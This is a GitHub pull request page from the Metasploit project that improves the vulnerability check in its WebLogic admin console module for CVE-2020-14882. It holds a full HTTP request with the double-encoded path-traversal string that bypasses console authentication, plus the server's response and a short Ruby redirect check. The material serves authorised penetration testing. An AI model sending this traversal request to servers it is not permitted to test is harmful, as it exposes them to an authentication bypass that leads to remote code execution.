Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Enhance exploit/multi/http/weblogic_admin_handle_rce check #14478

Merged
merged 2 commits into from
Dec 10, 2020
Merged

Enhance exploit/multi/http/weblogic_admin_handle_rce check #14478

merged 2 commits into from
Dec 10, 2020

Conversation

wvu
Copy link
Contributor

@wvu wvu commented Dec 10, 2020
edited
Loading 

msf6 exploit(multi/http/weblogic_admin_handle_rce) > check

####################
# Request:
####################
POST /console/css/.%252e/console.portal HTTP/1.1
Host: 127.0.0.1:7001
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 41

handle=5gylXO6L0gDpYsO0ybKOMEYlewgKvqJ0te
####################
# Response:
####################
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache,no-store,max-age=0, no-cache,no-store,max-age=0
Date: Thu, 10 Dec 2020 03:11:02 GMT
Pragma: No-cache, No-cache
Location: http://127.0.0.1:7001/console/console.portal?_nfpb=true&_pageLabel=UnexpectedExceptionPage
Content-Length: 385
Content-Type: text/html; charset=UTF-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Frame-Options: SAMEORIGIN, SAMEORIGIN
Set-Cookie: ADMINCONSOLESESSION=xR5KoW_9RQk52AbuvAYAV4HUvSIxcOpbWxKSIiCfP2aKgoeRefrP!-1995002420; path=/console/; HttpOnly

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved
temporarily.</p>
<p>It's now at <a href="http://127.0.0.1:7001/console/console.portal?_nfpb=true&amp;_pageLabel=UnexpectedExceptionPage">http://127.0.0.1:7001/console/console.portal?_nfpb=true&amp;_pageLabel=UnexpectedExceptionPage</a>.</p>
</body></html>

[+] 127.0.0.1:7001 - The target is vulnerable. Path traversal successful.
msf6 exploit(multi/http/weblogic_admin_handle_rce) >

Updates #14324.

@wvu
Don't be lazy about checking the redirect
a33a6e6 
And don't be lazy about sending the request.

To trigger UnexpectedExceptionPage, we can send bogus data instead of
telegraphing our payload-less gadget chain.

God, I'm so lazy. This took like five extra minutes. :|
@wvu wvu self-assigned this Dec 10, 2020
wvu
wvu commented Dec 10, 2020
View reviewed changes
modules/exploits/multi/http/weblogic_admin_handle_rce.rb
Comment on lines +142 to +144
unless res.code == 302 &&
res.redirection.path == '/console/console.portal' &&
res.redirection.query.include?('_pageLabel=UnexpectedExceptionPage')
Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Turns out I could fit it in 80 columns anyway. 🎉

@wvu wvu merged commit d180a81 into rapid7:master Dec 10, 2020
@wvu wvu deleted the feature/weblogic branch December 10, 2020 07:04
@wvu
Copy link
Contributor Author

wvu commented Dec 10, 2020

Release Notes

Enhanced the check in exploit/multi/http/weblogic_admin_handle_rce, specifically for CVE-2020-14882.

@gwillcox-r7 gwillcox-r7 added the rn-enhancement release notes enhancement label Dec 21, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@wvu wvu

Labels
enhancement module rn-enhancement release notes enhancement
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@wvu @gwillcox-r7